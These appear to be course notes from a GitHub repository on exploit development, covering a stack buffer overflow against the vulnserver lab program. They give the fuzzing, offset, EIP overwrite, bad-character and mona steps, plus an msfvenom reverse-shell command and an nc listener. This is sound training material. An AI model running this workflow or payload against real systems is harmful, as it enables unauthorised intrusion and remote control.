Skip to content

Latest commit

 

History

History
104 lines (72 loc) · 4.87 KB

13. Exploit Development.md

File metadata and controls

104 lines (72 loc) · 4.87 KB

Exploit Development

Downloading Our Materials

  • victim machine: vulnserver on windows 10.
  • immunity debugger

Buffer Overflows Explained

Memory

  • Kernel TOP
  • Stack
  • Heap
  • Data
  • Text BOTTOM

Stack

  • Extended Stack Pointer ESP - TOP
  • Buffer Space
  • Extended Base Pointer EBP - BOTTOM
  • Extended Instruction Pointer EIP / Return Address

Buffer

Buffer has a limited space, if you overflows it, you reach the EBP and EIP. Once in EIP, we can point to directions with malicious code to have a reverse shell.

Spiking

Find a vulnerable part in a program.

  • First, disable your windows protection.
  • run vulnserver and immunity as an admin.
  • in immunity, go to file and attach, hit play.
  • in kali, run nc -nv your-windows-ip 9999, you should connect to vulnserver
  • we test all the commands with weird characters generic_send_tcp your-windows-ip 9999 stats.spk 0 0 (see stats.spk)
  • same with generic_send_tcp your-windows-ip 9999 trunk.spk 0 0 (see trunk.spk), now we're overflowing. Immunity pauses before the server crashes.

Fuzzing

Send some characters to a specific command to see if we can break a program.

Like before, we're overflowing TRUN with As, but we want to know when we reach the limit.

  • Make your python script executable chmod +x fuzz.py (see fuzz.py)
  • Run ./fuzz.py
  • We crashed at 2700 bytes.

Finding the Offset

So that we can target the EIP.

  • generate some code to send with /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000, length is 3000 because it's more or less where we crashed.

  • Make your python script executable chmod +x offset.py (see offset.py)

  • Run ./offset.py, we're above the target, note down what you have for EIP in immunity: 386F4337

  • generate some code to send with /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000 -q 386F4337: exact match at offset 2003.

Overwriting the EIP

  • shellcode = b"A" * 2003 + b"B" * 4 so that we overwrite the EIP with Bs.
  • Make your python script executable chmod +x overwrite.py (see overwrite.py)
  • Run ./overwrite.py, now EIP is 42424242, as we wanted, now we control the EIP.

Finding Bad Characters

  • we can use https://github.com/cytopia/badchars, copy one of the examples provided, to test characters on the program
  • Make your python script executable chmod +x badchars.py (see badchars.py)
  • Run ./badchars.py
  • in immunity, right click on ESP and follow in dump, we go through all the hex codes, from 01 to FF, everything seems in place in our case (it's an eye test: write down all the missing characters). If you have 2 bad characters in a row (B0), only worry about the first one.

Finding the Right Module

Look for dll or something similar without memory protection in our program.

  • we'll use https://github.com/corelan/mona, put mona.py in immunity folder called PyCommands

  • type !mona modules in immunity command bar and hit enter

  • we look for vulnserver modules with protections on false: essfunc.dll looks promising.

  • in kali, locate nasm_shell, copy the ruby file.

  • run /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb

  • JMP ESP, we jump to ESP, equivalent is FFE4, exit

  • back to immunity, we enter mona find -s "\xff\xe4" -m essfunc.dll, we get the return address of the vulnerable dll.

  • we edit our python code to target the vulnerable dll as EIP. We enter the return address in reverse 625011af becomes "\xaf\x11\x50\x62" (low bytes at the lowest address, high bytes at the highest address)

  • in immunity, enter expression to follow: 625011af, we should find ffe4 (jmp esp), hit f2 to set a breakpoint on it.

  • Make your python script executable chmod +x jump.py (see jump.py)

  • Run ./jump.py

Generating Shellcode and Gaining Root

  • run msfvenom -p windows/shell_reverse_tcp LHOST=your-kali-ip LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\x00", -p is payload, -f for filetype is in C, -a for architecture, -b for bad characters
  • copy the result, check the payload size.
  • in shellcode.py, we add the overflow, plus a little bit of padding with "\x90" + 32 (NOP sled to help with the reliability of the exploit).
  • open the listening port: nc -nlvp 4444
  • Make your python script executable chmod +x shellcode.py (see shellcode.py)
  • Run ./shellcode.py, now you got a shell on vulnserver.

Python3 and More

  • create a folder called mona, then in immunity: !mona config -set workingfolder c:\mona
  • for bad characters: !mona bytearray -cpb "\x00"
  • !mona compare -f c:\mona\bytearray.bin -a 010AF9C8
  • !mona jmp -r ESP -m "essfunc.dll"